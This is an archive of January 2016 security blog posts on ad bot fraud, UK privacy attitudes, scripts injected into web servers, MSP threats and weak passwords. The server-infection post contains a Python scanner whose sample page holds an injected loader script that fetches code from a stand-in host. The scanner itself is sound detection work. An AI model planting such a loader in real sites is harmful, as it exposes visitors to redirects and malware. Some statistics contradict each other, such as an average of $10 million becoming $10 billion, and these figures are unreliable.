Month: January 2016

Cost of Bot Fraud to Rise to 7 Billion in 2016

The cost of bot fraud in 2016 is likely to rise to a staggering $7.2 billion, according to a new report by the Association of National Advertisers (ANA).

2015 Bot Baseline study places the cost of bot fraud at over $7 billion

The study, conducted in conjunction with WhiteOps, shows that despite efforts to reduce the impact of bot fraud, criminal gangs are still managing to game the online advertising industry. Advertisers are being tricked into thinking that real visitors are viewing their adverts and are paying for those visits, when in actual fact a substantial percentage come from bots.

For some companies the losses were shocking. The highest losses were reported to have cost one company $42 million over the course of the year. However, even smaller companies did not escape unscathed. The cost of bot fraud for the least affected advertiser was $250,000.

ANA studied 1,300 advertising campaigns conducted by 49 major companies over a period of two months from August 1, 2015, to September 30, 2015. The results of the study were then extrapolated to provide the cost of bot fraud for 2016.

The study examined more than 10 billion ad impressions to determine the percentage that were real visitors. To distinguish bot visits from the human visits, ANA/WhiteOps added detection tags to the advertising campaigns under study.

The same study was conducted back in 2014 and this year’s results show that virtually nothing has changed, with a fall in bot fraud of just 0.2% registered. The level of bot fraud has remained constant, although the cost to companies has increased.

In 2014, online advertisers were estimated to have lost around $5 billion to bot fraud. The rise in the cost of bot fraud is due to an expected increase in advertising investment over the course of the next 12 months.

Last year, brands suffered an average of $10 million in losses to bot fraud. That’s an average of $10 billion paid to advertise to bots. For 25% of companies, 9% of impressions go to non-human traffic.

Methods of bot detection have improved, but they are clearly not having much of an effect on the cost of bot fraud for advertisers. As detection methods improve, bot operators have improved their ability to obfuscate their bot visits.

Unfortunately, it is difficult to distinguish bot traffic from real traffic as more residential IP addresses are being used, and the bots are becoming better at mimicking real browsing habits.

Data Privacy Concerns in Britain Highlighted by New Study

A new study has revealed that British consumers are becoming increasingly worried about how companies are using the data they provide online. Data privacy concerns in Britain are now at a level where more people worry about their data and how it is being used than about losing their main source of income.

The National Cyber Security Alliance GB Consumer Privacy Index/TRUSTe study results were released in time for European Data Protection Day on January 28, an international day which aims to improve consumer awareness of data privacy issues and encourages businesses to do more to ensure that stored data are properly protected.

Now in its tenth year, Data Protection Day (Data Privacy Day in the United States) is recognized by over 47 EU countries. A number of privacy initiatives are launched on January 28, and efforts are made to improve awareness of the types of data that are being collected on consumers, how they are being used, and the risks that come from providing those data to companies.

This year, there is a major focus on increasing awareness of how companies are sharing the data that are provided to them by consumers.

Study reveals major data privacy concerns in Britain

The online survey, conducted by Ipsos, took a representative sample of 1,000 individuals in the UK and probed attitudes to data privacy and the measures currently being adopted by consumers to protect online privacy. Respondents were asked about online browsing habits from a privacy perspective, and trust issues they had with websites and web applications.

955 respondents said they were concerned about their privacy online and 364 respondents said they had stopped using an app or website in the past 12 months due to privacy concerns. For many of the respondents, online privacy was such a concern that they worried more about the use and exposure of their data than losing their primary source of income. British online privacy concerns ranked 10 percentage points higher than the fear of loss of the main source of income.

Concern can be explained, in part, by the lack of transparency about how consumer data are being used by companies, and with whom they are being shared. 1 in 4 respondents claimed not to know how companies were using and sharing their data.

Privacy fears were shown to be affecting how consumers view businesses and appear to influence the use of online services. Of the individuals who were concerned about their online privacy, 76% limited their online activities as a result.

The lack of transparency about how data is used can have a serious impact on business. 89% of respondents said they avoid companies that they do not believe will do enough to protect their privacy. The message to businesses is: Fail to explain what is done with data and consumers will take their business elsewhere.

How are British privacy concerns affecting online activity?

The survey examined privacy concerns in Britain and how those concerns affected online activity in the past 12 months.

  • 46% claimed to have withheld personal information from online companies
  • 23% stopped an online transaction due to privacy concerns
  • 53% did not click on an advert as they were worried about their privacy
  • 31% avoided downloading an app or product due to a perceived privacy risk

More than half of respondents (54%) do not trust businesses to be able to store and protect their personal information online and 51% said they do not feel they are in control of their online data.

One of the ways that companies can improve trust is by allowing consumers to remove their data on request. 43% said that they would trust a company more if they were made aware how they could remove personal information if they so required.

Interestingly, while data privacy concerns in Britain are high, the majority of respondents did little to protect their privacy. For instance, 58% of respondents were aware they could delete cookies from their computers, yet only 49% did. Location tracking on smartphones can be turned off and 44% of respondents were aware of this, yet only 28% actually disabled the feature. Only 12% of respondents read privacy policies, yet 31% claimed that they knew that they could be read.

With data privacy concerns in Britain so high, businesses that fail to do enough to secure data and protect consumer privacy are likely to lose out to companies that do. Furthermore, once online trust is lost, it can be difficult to regain.

Hidden Scripts on Servers Redirecting Users to Malicious Websites

Anti-virus software company Symantec has uncovered a new global web server infection. Hidden scripts on servers are redirecting website visitors to potentially malicious websites. So far over 3,500 hidden scripts on servers have been identified, which are being triggered when website visitors land on the compromised site. That visitor is then directed to a potentially malicious website.

This is a mass injection on a truly global scale. Hidden scripts on servers in over 75 countries have been discovered, although almost half of the compromised websites are located in the United States. 47% of infections were discovered in the U.S., 12% were discovered on servers in India, with the UK, Italy, and Japan accounting for 6% each. France, Canada, and the Russian Federation each had 5% of infections, with 4% discovered in Australia and Brazil.

The majority of compromised websites were used by businesses, and .edu, .gov, and other government websites had also been compromised.

Hidden scripts on servers pose a significant threat to website visitors

At present, the scripts have not been found to direct users to websites where drive-by malware downloads occur, nor have visitors been redirected to websites infected with malware. However, there is considerable potential for criminals to alter the scripts to deliver visitors to websites capable of delivering malware. A network of servers could be being built for a future global attack.

The malicious code injection can be found before the </head> tag. The injected JavaScript code is set to run 10 seconds after the user’s browser has loaded the page. The script is used to launch multiple other scripts to mask the action from the visitor.

The scripts are understood to currently be used to collect data on users, which Symantec lists as including host IP address, Flash version, referrer, search term queries, page title, monitor resolution, user language, and URL page address. The hidden scripts could potentially be used for a wide range of malicious purposes.

All of the infections so far detected have affected a specific website content management system, although that CMS has not been disclosed. All website administrators are advised to check their websites and search for any injected code.

Should any code be located, it is not just a case of changing the administrator password and removing the script from the site. Backdoors may also have been installed and full webserver sanitization is likely to be required to totally remove the infection.
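As a starting point for the check advised above, the following added example (not Symantec's tooling and not code from the original article) scans page and template files for inline scripts that match the traits described: placed directly before the </head> tag, run after a long delay, and loading further scripts. The regular expressions, the 5-second threshold, the file suffixes, and the sample page are assumptions, since the injected code itself is not shown here.

```python
import re
from pathlib import Path

# Assumed patterns built from the traits described above (real code not shown here).
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>", re.I | re.S)
HEAD_CLOSE_RE = re.compile(r"</head\s*>", re.I)
TIMER_RE = re.compile(r"set(?:Timeout|Interval)\s*\(.*?,\s*(\d+)\s*\)", re.S)
LOADER_RE = re.compile(r"createElement\s*\(\s*['\"]script['\"]|document\.write\s*\(", re.I)

def scan_html(html, min_delay_ms=5000):
    """Flag inline scripts in <head> that show at least two of the described traits."""
    head_end = HEAD_CLOSE_RE.search(html)
    if not head_end:
        return []
    findings = []
    for m in SCRIPT_RE.finditer(html, 0, head_end.start()):
        attrs, body = m.groups()
        if re.search(r"\bsrc\s*=", attrs, re.I) or not body.strip():
            continue  # external reference: nothing inline to inspect
        reasons = []
        delays = [int(d) for d in TIMER_RE.findall(body)]
        if delays and max(delays) >= min_delay_ms:
            reasons.append("delayed execution (%d ms)" % max(delays))
        if LOADER_RE.search(body):
            reasons.append("loads further scripts")
        if not html[m.end():head_end.start()].strip():
            reasons.append("last element before </head>")
        if len(reasons) >= 2:
            findings.append({"line": html.count("\n", 0, m.start()) + 1, "reasons": reasons})
    return findings

def scan_tree(root, suffixes=(".html", ".htm", ".php", ".tpl")):
    """Scan page and template files under a web root; returns {path: findings}."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = scan_html(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

# Constructed sample page (not taken from a real infection).
INJECTED_SAMPLE = """<html><head>
<title>Shop</title>
<script src="/static/app.js"></script>
<script>setTimeout(function () {
  var s = document.createElement("script");
  s.src = "//tracker.example.invalid/c.js";
  document.getElementsByTagName("head")[0].appendChild(s);
}, 10000);</script>
</head><body></body></html>"""

if __name__ == "__main__":
    print(scan_html(INJECTED_SAMPLE))
```

A hit is a lead for manual review rather than proof of compromise, and a clean scan does not rule out the backdoors mentioned above.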

Common Data Security Threats MSPs Must Address

MSPs must not forget to address the following common data security threats if they are to keep their clients protected from cyberattacks.

Failure to prevent malware & ransomware installation can be an expensive business. Multi-million-dollar liability lawsuits may follow if insufficient security measures have been implemented to prevent a cyberattack.

Unfortunately, all too often too little is done to keep networks protected from these common data security threats.

Common data security threats MSPs must address!

Listed below are five common data security threats that must be addressed by MSPs, yet they are all too often overlooked.

Anti-phishing protection is essential

Employees have long been known to be a major security risk. There will always be at least one employee in an organization who is a little green when it comes to protecting themselves and their work computer from hackers.

Any organization that fails to adequately protect against the risk of employee errors compromising the network will suffer a network security incident sooner rather than later. One of the biggest mistakes made is employees responding to phishing emails.

Employees must be made aware of the high risk of phishing. Hackers are now targeting individual employees with highly sophisticated campaigns. Targets are researched via Facebook and other social media networks, the senders of emails have their names and addresses spoofed, and clever campaigns are devised to get end users to download malware or visit malicious websites. Regular training on basic security such as phishing avoidance and scam email identification is therefore essential.

Take control of mobile devices used to connect to the network

Phishing is far from the only employee security risk. Employees are now bringing their own devices to work, and these devices pose a major security risk if not effectively managed. If a single employee manages to get their own personal device infected with malware, the infection could all too easily spread to a corporate network.

It is therefore essential not only to limit the individuals who are able to use personal devices for work purposes, but to ensure that any device used for work purposes is routinely monitored.

If employees are permitted to use personal devices for work, or remove laptop computers from company premises, it is essential that sensitive data stored on those devices is encrypted. Mobile devices are frequently lost or stolen and represent a considerable data security risk.

Prepare for a wave of malware attacks on Macs

Over the past few years, using a Mac meant you were protected from malware and viruses; however, last year new malware started to appear that specifically targeted Apple devices. While anti-malware protection for Macs was something that could previously be ignored, that is now no longer the case.

The volume of malware targeting Macs is expected to continue to increase this year as Apple’s market share grows. It is now important for all organizations to start preparing for a new wave of Mac attacks.

Implement a robust web filtering solution

Cybercriminals are increasingly using legitimate websites to serve malware to website visitors. Recently, the MSN home page was discovered to be hosting malvertising, showing that even some of the biggest internet sites may not be entirely safe. It is therefore essential to implement a web filtering solution that can block malvertising, as well as malicious websites known to deliver drive-by malware payloads.

To keep users and networks protected, it is essential to implement safe search, block pharming URLs, malware and phishing sites, tunneling software, and malicious adverts. To avoid negative impact on the business, use a web filtering solution such as WebTitan, which offers a high degree of granularity. This will allow different individuals and users to be assigned different privileges to maximize protection and minimize the negative impact on the business.

Develop patch management policies and plug security holes promptly

Zero-day security vulnerabilities are being discovered on an almost daily basis. Once identified, exploits are rapidly shared via Darknet communities. If security vulnerabilities are allowed to remain, it is only a matter of time before they will be used for an attack. It is therefore essential that software is kept up to date and patches are installed as soon as they are released.

However, due to the sheer volume of devices, applications, operating systems, and plugins now in use, keeping on top of all of the upgrades and patches can be overwhelming. Patches must be found, installed, and tested, and all procedures must be documented for compliance purposes. Due to the security risk posed by out of date software, if the task of managing patches is becoming unmanageable, it may be time to consider using an automated patch management solution.

Worst Passwords of 2015 Revealed

If you want to keep your accounts secure, it is probably best not to use the word password as your password. However, you could do worse according to a list of the worst passwords of 2015 that has recently been published. 123456 is a much worse choice.

The list of the worst passwords of 2015 would be comical were it not for the fact that so many people actually use these words, phrases, and numerical sequences to (barely) secure their accounts. Send the list around your organization and you may even hear a few gasps as users open the document to discover that their cunning password has been revealed to the masses.

The worst passwords of 2015 list contains some absolute howlers, but also some that users may think are actually quite. Sadly though, passw0rd is not that difficult for a hacker to guess. 1qaz2wsx is better, but not by much. That also makes it onto this year’s top 25 list.

Unsurprisingly with a new Star Wars film having just been released there are a few new entries along that theme. Solo makes it on the list, as does Princess, and StarWars. Minus the capital letters of course. Leia is not on there, but that does not mean it is a good choice either.

People are very bad at choosing passwords

The list of the worst passwords of 2015 serves as a reminder that we are very bad at choosing passwords. We would all like a password that is easy to remember and can be used across all accounts, especially hackers.

Even if a password does not make it into the top 25 list of the worst passwords of 2015 and instead earned place 499, it would not keep an account secured for long if a hacker attempts to crack it. Password dictionaries are compiled, updated, and used by hackers to gain access to accounts, and it doesn’t take long to run through a list of the top 1000 password choices and try them all. If a word is in the Oxford or Merriam-Webster English dictionary, it will be on a hacker’s list as well.

The best approach to take when choosing a password is to make sure it can’t actually be remembered very easily. The longer and more complicated the password is, the harder it will be for a hacker to crack it. Special characters must be used, numbers, capital letters, and lower case as well. Since some end users will ignore this advice, it is essential to enforce the minimum number of characters and the use of capitals, numbers, and special characters.

According to SplashData, the company that compiled the list of the worst passwords of 2015, in order to keep accounts secure it is essential to create one that is hard to remember for all accounts, and to use a password manager so they do not need to be remembered. The company suggests the use of its own one of course.

However, the most popular password manager – LastPass – was recently shown not to be as secure as people may think. Hackers could all too easily spoof the viewport and obtain even the most difficult-to-guess password.

A complex, difficult-to-guess password for each site along with a password manager to help remember it is a good option, and it will help to keep accounts secure and will save sys admins from having to keep resetting user passwords.

However, the password itself is the problem really. That is what really needs to be changed. Any password-based security system is vulnerable and even two-factor authentication is not infallible.

The best choice for keeping accounts secure is to use biometric factors to verify identity, but sadly, at present the technology is too expensive for many companies to implement. The good news is the technology is becoming cheaper and before the decade is out an alternative to passwords could well be affordable enough for many businesses to implement. We will then finally be well on our way to consigning passwords to the history books.

SplashData’s List of the Worst Passwords of 2015

Listed below is SplashData’s list of the worst passwords of 2015, together with the list for 2014 for comparison. You can see that even with the increase in reported hacking incidents, many people are still choosing insecure passwords.

the worst passwords of 2015